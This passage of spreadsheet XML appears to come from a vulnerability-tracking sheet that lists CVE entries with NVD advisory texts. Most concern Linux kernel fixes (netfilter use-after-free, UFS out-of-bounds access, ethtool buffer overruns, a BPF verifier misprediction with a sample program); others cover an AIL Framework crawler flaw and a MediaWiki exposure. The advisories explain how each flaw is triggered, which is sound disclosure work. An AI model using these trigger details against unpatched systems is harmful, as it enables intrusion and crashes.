      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr"/>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: cttimeout: prevent UAF during module unload
nf_ct_set_timeout() protects the timeout hook dereference and policy lookup
with rcu_read_lock(). cttimeout_exit(), however, unregisters the per-net
operations before it clears the hook.
This allows the following interleaving:
  CPU 0                              CPU 1
  cttimeout_exit()                   nf_ct_set_timeout()
    unregister_pernet_subsys()         rcu_read_lock()
      kfree(pernet)                     h = nf_ct_timeout_hook
                                        h-&gt;timeout_find_get()
                                          nfct_timeout_pernet()
The hook still points to ctnl_timeout_find_get() when CPU 1 looks up the
already freed per-net timeout list. KASAN reported:
  BUG: KASAN: slab-use-after-free in ctnl_timeout_find_get
  Read of size 8 by task poc/90
  Call Trace:
   ctnl_timeout_find_get+0x271/0x2a0 [nfnetlink_cttimeout]
   nf_ct_set_timeout+0x7b/0x3c0
   xt_ct_tg_check+0x724/0xb20
   xt_check_target+0x234/0xa90
   do_ipt_set_ctl+0x570/0x1270
  Allocated by task 89:
   __kmalloc_noprof+0x16e/0x460
   ops_init+0x6d/0x420
   register_pernet_operations+0x2f6/0x670
  Freed by task 91:
   kfree+0x131/0x390
   ops_undo_list+0x3d4/0x730
   unregister_pernet_operations+0x232/0x490
   unregister_pernet_subsys+0x1c/0x30
   cttimeout_exit+0x52/0x970 [nfnetlink_cttimeout]
Clear the hook and wait for existing readers before unregistering the
per-net operations. This blocks new policy lookups and ensures readers that
observed the hook finish before the per-net storage is freed.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97609</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97926</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr"/>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ufs: validate cylinder group metadata before caching it
ufs_read_cylinder() copies the cylinder group index and the rotor
positions straight from the on-disk group and caches them without any
check:
	ucpi-&gt;c_cgx    = fs32_to_cpu(sb, ucg-&gt;cg_cgx);
	ucpi-&gt;c_rotor  = fs32_to_cpu(sb, ucg-&gt;cg_rotor);
	ucpi-&gt;c_frotor = fs32_to_cpu(sb, ucg-&gt;cg_frotor);
	ucpi-&gt;c_irotor = fs32_to_cpu(sb, ucg-&gt;cg_irotor);
They are then used as indices during allocation and free:
  - c_cgx indexes the cylinder summary array as
    UFS_SB(sb)-&gt;fs_cs(ucpi-&gt;c_cgx), so a value past s_ncg writes a 32
    bit count outside the s_csp allocation.
  - c_frotor becomes a bitmap scan start, start = c_frotor &gt;&gt; 3, and
    then length = ((s_fpg + 7) &gt;&gt; 3) - start. A start beyond the block
    bitmap wraps the unsigned length to a huge value, so ubh_scanc()
    walks far past the cylinder group buffers. c_irotor drives the
    inode bitmap the same way.
A crafted image can set any of these freely, turning an ordinary
allocation into an out of bounds access.
Reject a cylinder group whose recorded index does not match the group
being read, or whose rotors fall outside the group, before the metadata
is cached. Valid filesystems keep cg_cgx equal to the group number and
the rotors within the group, so only malformed images are rejected.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97926</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97931</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr"/>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: us122l: Prevent write upgrades for read mappings
The hwdep mmap callback rejects read-buffer mappings that are initially
writable, but leaves VM_MAYWRITE set on mappings created with PROT_READ.
A process that can open the hwdep node O_RDWR can later use mprotect() to
make the mapping writable.
The read allocation begins with struct usb_stream. Its read_size member is
used by the fault handler to decide which pages belong to the read buffer.
The read VMA intentionally remains expandable because pcm_usb_stream uses
mremap() after reading that size. Changing read_size first can therefore
map and access pages beyond the allocation. The same member is also
consumed by usb_stream_free(), where changing it can make
free_pages_exact() release pages outside the allocation.
Clear VM_MAYWRITE for read-buffer mappings after rejecting an initially
writable VMA. This keeps the separate output-buffer mapping writable while
preventing later permission upgrades.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97931</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97953</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr"/>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix TX descriptor availability check for TSO traffic
stmmac_tso_xmit() estimates the number of free TX descriptors required by
a TSO skb as:
	(skb-&gt;len - proto_hdr_len) / TSO_MAX_BUFF_SIZE + 1
which assumes the payload is split into TSO_MAX_BUFF_SIZE chunks. This
underestimates the descriptors actually consumed by stmmac_tso_allocator(),
since each fragment is mapped individually and so it needs at least one
descriptor regardless of its size. Moreover, one descriptor is used for
the L2/L3/L4 headers and, when the MSS changes, one more is consumed for
the MSS context descriptor.
For a highly fragmented TSO skb the check can therefore pass even when the
ring has too few free slots. stmmac_tso_allocator() then writes past the
available descriptors, overwriting descriptors still owned by the DMA
engine, corrupting the TX ring.
Add stmmac_tso_get_num_desc() to compute the exact number of descriptors
needed for the header, the linear payload and each fragment, plus the MSS
context descriptor when required, and use it in the availability check.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97953</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98027</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr"/>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: dsa: mv88e6xxx: bound the policy rule dump by the caller's buffer size
mv88e6xxx_get_rxnfc() uses rxnfc-&gt;rule_cnt as the write index while
dumping the policy IDR, clobbering the input value before it has been
looked at.  That input is the number of entries the caller had room for.
ETHTOOL_GRXCLSRLALL requires no CAP_NET_ADMIN and the ioctl sizes the
buffer from the rule_cnt userspace passes in, so once an admin has
installed policy rules any user can ask for fewer slots than there are
rules and run off the end of the allocation.  A rule_cnt of 0 leaves the
buffer pointer NULL and the walk dereferences it.
Count into a local so the caller's limit survives the walk, and stop with
-EMSGSIZE once it is reached.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98027</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98029</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr"/>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
eth: nfp: bound the ntuple rule dump by the caller's buffer size
nfp_net_get_fs_loc() dumps every entry of nn-&gt;fs.list into rule_locs[]
without consulting cmd-&gt;rule_cnt, which is how many entries the caller
had room for.  ETHTOOL_GRXCLSRLALL requires no CAP_NET_ADMIN and the
ioctl sizes the buffer from the rule_cnt userspace passes in, so once an
admin has installed flow steering rules any user can ask for fewer slots
than there are rules and run off the end of the allocation.  A rule_cnt
of 0 leaves the buffer pointer NULL and the walk dereferences it.
Bail out with -EMSGSIZE when the buffer fills up, the way the other
ntuple capable drivers do, and report how many locations were filled so
a shrinking rule list does not leave the caller reading stale slots.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98029</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98030</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr"/>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: dsa: bcm_sf2: bound the CFP rule dump by the caller's buffer size
bcm_sf2_cfp_rule_get_all() walks the whole cfp.unique bitmap into
rule_locs[] without consulting nfc-&gt;rule_cnt, which is how many entries
the caller had room for.  ETHTOOL_GRXCLSRLALL requires no CAP_NET_ADMIN
and the ioctl sizes the buffer from the rule_cnt userspace passes in, so
once an admin has installed CFP rules any user can ask for fewer slots
than there are rules and run off the end of the allocation.  A rule_cnt
of 0 leaves the buffer pointer NULL and the walk dereferences it.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98030</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98041</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr"/>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Don't predict JMP32 pointer vs zero comparisons
Consider the following program:
        r1 = map_value;      /* low 32 bits are zero at runtime */
        r6 = 0xdead000000000000;
        if w1 != 0 goto l1;
    l0: r1 += r6;
        r2 = *(u64 *)(r1 + 0);
        exit;
    l1: r6 = 0;
        goto l0;
At the moment is_branch_taken() reports the jump as always taken,
because it does not distinguish between BPF_JMP and BPF_JMP32
comparisons when processing 'if w1 != 0 ...'.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98041</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98083</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr"/>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix transaction use-after-free in raid stripe insertion
If allocation of a RAID stripe extent fails,
btrfs_insert_one_raid_extent() aborts and ends the transaction before
returning -ENOMEM.
btrfs_finish_one_ordered(), the production caller through
btrfs_insert_raid_extent(), still owns the transaction handle. It handles
the error by aborting the transaction and then reaches the common exit
path, which ends the transaction again.
The premature end can free the handle and drop its transaction reference.
Transaction cleanup can then free the transaction before the caller's
second abort accesses the handle and transaction, resulting in
use-after-free.
Keep the abort at the failure site, but let the caller's common exit path
end the transaction once, after it has finished using both objects.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98083</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98150</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr"/>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix BPF_F_CPU validation for sparse CPU IDs
BPF_F_CPU stores the target CPU ID in the upper 32 bits of the map
operation flags. bpf_map_check_op_flags() currently compares that ID
with num_possible_cpus(), which is the number of possible CPUs rather
than a bound on CPU IDs.
On an arm64 QEMU guest with a CPU device-tree hole, the possible CPU
mask was 0,2-3. A userspace program using raw bpf() syscalls creates
a BPF_MAP_TYPE_PERCPU_ARRAY and performs update and lookup operations
for each CPU by setting BPF_F_CPU and the CPU ID in the flags.
With the old check, CPU 1 is incorrectly accepted while valid CPU 3 is
rejected with -ERANGE. The CPU 1 update then reaches the per-CPU map
access path and triggers:
  Unable to handle kernel paging request at virtual address ...
  pc : __pi_memcpy_generic+0x5c/0x22c
  lr : bpf_percpu_array_update+0x2dc/0x2e8
  Call trace:
    __pi_memcpy_generic
    bpf_map_update_value
    map_update_elem
    __sys_bpf
Check the CPU ID against nr_cpu_ids and cpu_possible() instead. This
rejects CPU IDs outside the valid range and CPUs absent from the
possible mask, while allowing valid sparse CPU IDs.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98150</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98154</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr"/>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-rdma: fix -EIO cleanup order in queue_rq
On -EIO, the RDMA queue_rq path reports a host path error and then
still cleans up the command and unmaps the SQE DMA. The path error
helper completes the request, so that is double cleanup and DMA unmap
after the request is already complete.
Unmap the SQE first, then report the host path error. Skip the outer
command cleanup on that path.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98154</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100187</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>The Onion module in AIL Framework contained a performance shortcut in its URL extraction logic that accepted URLs as valid .onion targets based solely on a length check (exactly 69 characters) and a suffix check (ending in ".onion"), without performing proper hostname parsing or onion-domain validation. An unauthenticated attacker who could publish or control web content crawled by the framework could embed a crafted URL containing an IP address or non-onion hostname with a path ending in ".onion" that satisfied the length and suffix conditions. Such a URL would be extracted, its domain naively sliced from the string, and queued as a legitimate onion crawler task. This allowed unauthenticated content publishers to inject arbitrary non-onion targets into the crawler's task queue, influencing crawler behavior and potentially directing it toward unintended network resources. The vulnerability required no authentication, no user interaction, and only the ability to place crafted content in a location the framework would crawl. The security impact is a loss of integrity in the crawler's target selection: the framework processes and acts upon URLs that do not correspond to legitimate .onion services.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100187</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100377</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - WikiLambda Extension allows Excavation.
This issue affects Mediawiki - WikiLambda Extension: 1.47.0-alpha. The issue has been remediated on the `master` branch.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100377</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17545</t>
